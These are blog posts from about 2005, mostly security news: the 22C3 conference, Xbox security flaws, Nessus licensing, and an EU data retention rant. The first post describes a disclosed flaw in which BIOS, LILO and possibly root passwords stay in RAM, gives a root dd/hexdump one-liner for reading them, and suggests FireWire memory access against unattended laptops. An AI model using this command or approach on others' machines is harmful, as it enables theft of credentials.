How to dump your BIOS/LILO/root password as plain text [Update]

This is old news by now, but still interesting IMHO. Jonathan Brossard has posted an article on BugTraq which gives a pretty good introduction to the inner workings of the BIOS (with lots of links to more detailed resources) as well as known vulnerabilities of the BIOS password mechanism.

The most interesting part is when he explains that the BIOS doesn't seem to erase its own keyboard buffer before it hands over control to the operating system. Also, current OSes (Linux, Windows, *BSD, etc.) don't seem to clear that buffer either.

This may not sound dangerous, but it actually allows anyone who can read the contents of your RAM, starting from address 0x041e, to view the keyboard buffer contents. And this buffer contains the BIOS password you type in when booting your machine (if you set/use a BIOS password, of course).

This one-liner (executed as root) should let you view your password as plain text:

dd if=/dev/mem bs=512 skip=2 count=1 | hexdump -C | head

(Only every second character belongs to the password, the rest are key scan codes, I think).

I also noticed that this same buffer also contains your LILO password, too! The same is probably true for passwords of other boot loaders such as GRUB, but I didn't test that.

Yes, reading this part of the RAM usually requires root privileges in Unix-like OSes, but as the security problem is OS-independant other OSes (e.g. DOS, or older Windows versions) might be directly affected.

But even on more secure OSes this plain-text storage of the BIOS/boot loader passwords might be a problem. Combine this with some Firewire insecurities and attackers with physical access to your machine (e.g. your unattended laptop, while you are on the toilet) might be able to read your BIOS/LILO passwords even though you locked your machine. I haven't yet tried this, but I'm pretty sure it's possible. Please post the results here if you try this.

(via Stefan 'Sec' Zehl)

Update 2006-01-09: It seems that when you use software suspend (swsuspend2) the RAM area can/will also contain your root password! Thanks nelson for reporting.

22C3: Final Stuff

More Bandwidth

OK, I will make this short because a gazillion of other people will probably blog about the 22C3 for several days or weeks to come... Today (last day) I only attended one talk — Bluetooth Hacking - The State of The Art. Funny stuff you can do with Bluetooth...

All in all it was a great conference. Get the proceedings or browse the list of talks (most of them have PDFs attached) for more details. Videos of all talks should be available anytime soon (I hope!).

Oh, and the 22C3 is probably the only event where you will see such signs (attached to walls by the congress staff!)...

17 Mistakes Microsoft Made in the Xbox Security System

Nice. Very nice. The Xbox-Linux / Free60 team around Michael Steil has published a paper / wiki page called 17 Mistakes Microsoft Made in the Xbox Security System. I'm currently reading the paper, but I'm not quite through yet (the PDF is 13 pages long). It contains a very detailed analysis of the 17 types of mistakes Microsoft made (they made most of them multiple times)...

The paper and the findings will be presented at the 22C3 in Berlin — this is one of the lectures I will definately be attending, that's for sure!

Quoting from the article:

"[Conclusion: ]The security system of the Xbox has been a complete failure.".

Also nice: the earlier (now obsolete) version of the paper was called The Hidden Boot Code of the Xbox — or "How to fit three bugs in 512 bytes of security code" ;-)

(via Golem)

EU adopts Big Brother data retention directive, ignores industry and civil society [Update]

Heise (and many other sources) report that the EU parliament has voted for the abysmal data retention directive, simply ignoring objections from the industry and the civil society.

The EU has turned into a police state where more than 450 million citizens are treated as criminals by default now! 1984 is a joke compared to this. We're all fucked! Bigtime!

Please, someone go out and sue the shit out of the fucking idiots who are responsible for this kindly remind the responsible politicians that this directive is a really bad idea!

Update 2005-12-15: OK, so I might have overreacted. My first answer to the accusations would probably be (abusing an unrelated quote from Jonathan McDowell): "I exaggerate for effect". But honestly, while it's not as bad as 1984, I really do think that this law will bring us all a big step nearer to a 1984-type horror scenario.


Nessus 3.0 released as closed-source project [Update]

Nessus 3.0 (a popular security vulnerability scanner) has been released, and the license was changed from the GPL to a closed-source license. Goodbye Nessus, hello Porz-Wahn, hello OpenVAS, hello Sussen.

Update 2005-12-13: Added Sussen.

(via Golem)

Syndicate content